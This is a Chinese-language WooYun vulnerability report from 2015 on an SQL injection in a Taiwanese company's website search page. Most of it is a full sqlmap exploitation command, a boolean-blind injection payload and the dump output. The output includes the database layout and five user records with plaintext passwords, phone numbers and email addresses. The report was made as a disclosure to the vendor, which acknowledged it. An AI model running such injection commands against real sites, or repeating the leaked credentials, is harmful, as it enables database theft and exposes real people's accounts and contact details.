当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157804

漏洞标题:歐普達資訊有限公司主站存在SQL注射漏洞(5W用户明文密码电话号码邮箱地址)(臺灣地區)

相关厂商:歐普達資訊有限公司

漏洞作者: 路人甲

提交时间:2015-12-03 11:46

修复时间:2016-01-17 22:48

公开时间:2016-01-17 22:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

歐普達資訊有限公司主站存在SQL注射漏洞(5W用户明文密码电话号码邮箱地址)

详细说明:

地址:http://**.**.**.**/seach.php?seach_city=0&search_word=H&

$ python sqlmap.py -u "http://**.**.**.**/seach.php?seach_city=0&search_word=H&" -p search_word --technique=B --random-agent --batch  --no-cast -D lifeshow -T distributor -C userid,MemberName,passwd,Phone,Email --dump --start 1 --stop 5


back-end DBMS: MySQL 5
Database: lifeshow
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| distributor | 49580   |
+-------------+---------+


Database: lifeshow
Table: distributor
[5 entries]
+----------+------------+---------+---------------+-------------------------+
| userid   | MemberName | passwd  | Phone         | Email                   |
+----------+------------+---------+---------------+-------------------------+
| U0031412 | Song Ming  | c25357  | 852-2456-5588 | _life15@**.**.**.**      |
| U0003743 | 蜜蜂咩咩       | 730617  |               | 00-617@YAHOO.COM.TW     |
| U0029473 | 000000     | 073279  | 28222889      | 000000@**.**.**.**     |
| U0034811 | 毛豆         | 0000123 | 23197286      | 0000123@**.**.**.** |
| U0003573 | 0008KQ     | 0008kq  |               | 0008kq@**.**.**.**     |
+----------+------------+---------+---------------+-------------------------+

漏洞证明:

current user is DBA:    False
database management system users [1]:
[*] 'lifeshow'@'localhost'
Database: lifeshow
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| store_kind                            | 773408  |
| e                                     | 724585  |
| keyword_ip                            | 713428  |
| works                                 | 357455  |
| public_usedcar_equip                  | 137003  |
| store_goldkind                        | 104875  |
| store2                                | 74665   |
| store_search                          | 74622   |
| store                                 | 74304   |
| distributor                           | 49580   |
| coupon_store_kind                     | 24579   |
| public_usedcar                        | 17090   |
| public_product                        | 16758   |
| productkind1                          | 11188   |
| experience                            | 7345    |
| public_new2                           | 3921    |
| video2                                | 3906    |
| sponsored_links                       | 2933    |
| public_message                        | 2883    |
| lamp_news                             | 2480    |
| manager_silver                        | 1839    |
| count_index_check                     | 1669    |
| public_prod_dir                       | 1300    |
| public_ticket                         | 1293    |
| coupon_kind                           | 1262    |
| manager                               | 1138    |
| public_company                        | 1127    |
| productkindgold                       | 1126    |
| banner2                               | 1114    |
| public_landscape                      | 919     |
| public_banner                         | 910     |
| usedcar_car_kind                      | 870     |
| news2                                 | 790     |
| bookmark                              | 743     |
| tmp                                   | 698     |
| count_index                           | 692     |
| top_kind                              | 507     |
| store_popular                         | 421     |
| city                                  | 396     |
| keywordlist                           | 394     |
| public_story                          | 320     |
| online_shop                           | 203     |
| d_login_session                       | 176     |
| top_keyword                           | 135     |
| quick_search_word                     | 118     |
| design2                               | 109     |
| usedcar_link                          | 97      |
| experience_story                      | 78      |
| public_movie                          | 75      |
| usedcar_banner                        | 59      |
| forecast                              | 45      |
| activity_show                         | 44      |
| cover                                 | 41      |
| sample                                | 40      |
| coupon_news                           | 39      |
| usedcar_car_color                     | 39      |
| usedcar_car_equip                     | 35      |
| kind_store                            | 28      |
| service                               | 24      |
| vote                                  | 19      |
| beauty                                | 18      |
| lamp_banner                           | 17      |
| usedcar_car_kind2                     | 14      |
| coupon_keyword                        | 13      |
| coupon_popular                        | 12      |
| top_kind_prod                         | 12      |
| cover_category                        | 11      |
| usedcar_car_color2                    | 10      |
| videokind1                            | 10      |
| count_index_week                      | 7       |
| usedcar_car_from                      | 7       |
| usedcar_car_select                    | 7       |
| coupon_banner                         | 6       |
| coupon_case                           | 6       |
| designkind1                           | 6       |
| store_review                          | 5       |
| usedcar_text                          | 5       |
| activities                            | 4       |
| employees                             | 4       |
| lamp_hot_news                         | 4       |
| news1                                 | 4       |
| banner1                               | 3       |
| login_sid                             | 3       |
| customerActivity                      | 2       |
| customerActivityRestriction           | 2       |
| usedcar_car_brake                     | 2       |
| usedcar_car_suspension                | 2       |
| authentication                        | 1       |
| climate                               | 1       |
| count_story                           | 1       |
| customerActivityMemberForm            | 1       |
| public_acquaint                       | 1       |
| ratings                               | 1       |
| tv_show                               | 1       |
| webinfo                               | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1572    |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 276     |
| SESSION_VARIABLES                     | 276     |
| STATISTICS                            | 188     |
| PARTITIONS                            | 134     |
| TABLES                                | 134     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| KEY_COLUMN_USAGE                      | 112     |
| TABLE_CONSTRAINTS                     | 110     |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| PROCESSLIST                           | 4       |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: lifeshow
Table: distributor
[1 column]
+--------+
| Column |
+--------+
| passwd |
+--------+
Database: lifeshow
Table: employees
[1 column]
+----------+
| Column   |
+----------+
| password |
+----------+
Database: lifeshow
Table: manager
[1 column]
+----------+
| Column   |
+----------+
| PassWord |
+----------+
Database: lifeshow
Table: authentication
[1 column]
+--------+
| Column |
+--------+
| passwd |
+--------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_word (GET)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: seach_city=0&search_word=H%') AND MAKE_SET(2156=2156,5594) AND ('%'='&
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: lifeshow
Table: distributor
[21 columns]
+--------------+---------------+
| Column       | Type          |
+--------------+---------------+
| Add_Date     | date          |
| Address      | varchar(180)  |
| Birthday     | varchar(11)   |
| Blog         | varchar(200)  |
| City         | int(4)        |
| Cityarea     | int(4)        |
| Email        | varchar(60)   |
| Friend       | text          |
| ID           | int(11)       |
| Interested   | text          |
| Introduction | text          |
| MemberName   | varchar(45)   |
| Name         | varchar(30)   |
| passwd       | varchar(50)   |
| Phone        | varchar(20)   |
| pic          | varchar(250)  |
| Sex          | varchar(2)    |
| Silver       | enum('N','Y') |
| Silver_Lock  | enum('N','Y') |
| state        | varchar(2)    |
| userid       | char(8)       |
+--------------+---------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_word (GET)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: seach_city=0&search_word=H%') AND MAKE_SET(2156=2156,5594) AND ('%'='&
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: lifeshow
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| distributor | 49580   |
+-------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search_word (GET)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: seach_city=0&search_word=H%') AND MAKE_SET(2156=2156,5594) AND ('%'='&
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: lifeshow
Table: distributor
[5 entries]
+----------+------------+---------+---------------+-------------------------+
| userid   | MemberName | passwd  | Phone         | Email                   |
+----------+------------+---------+---------------+-------------------------+
| U0031412 | Song Ming  | c25357  | 852-2456-5588 | _life15@**.**.**.**      |
| U0003743 | 蜜蜂咩咩       | 730617  |               | 00-617@YAHOO.COM.TW     |
| U0029473 | 000000     | 073279  | 28222889      | 000000@**.**.**.**     |
| U0034811 | 毛豆         | 0000123 | 23197286      | 0000123@**.**.**.** |
| U0003573 | 0008KQ     | 0008kq  |               | 0008kq@**.**.**.**     |
+----------+------------+---------+---------------+-------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-03 22:47

厂商回复:

感謝通報

最新状态:

暂无

漏洞评价:

评价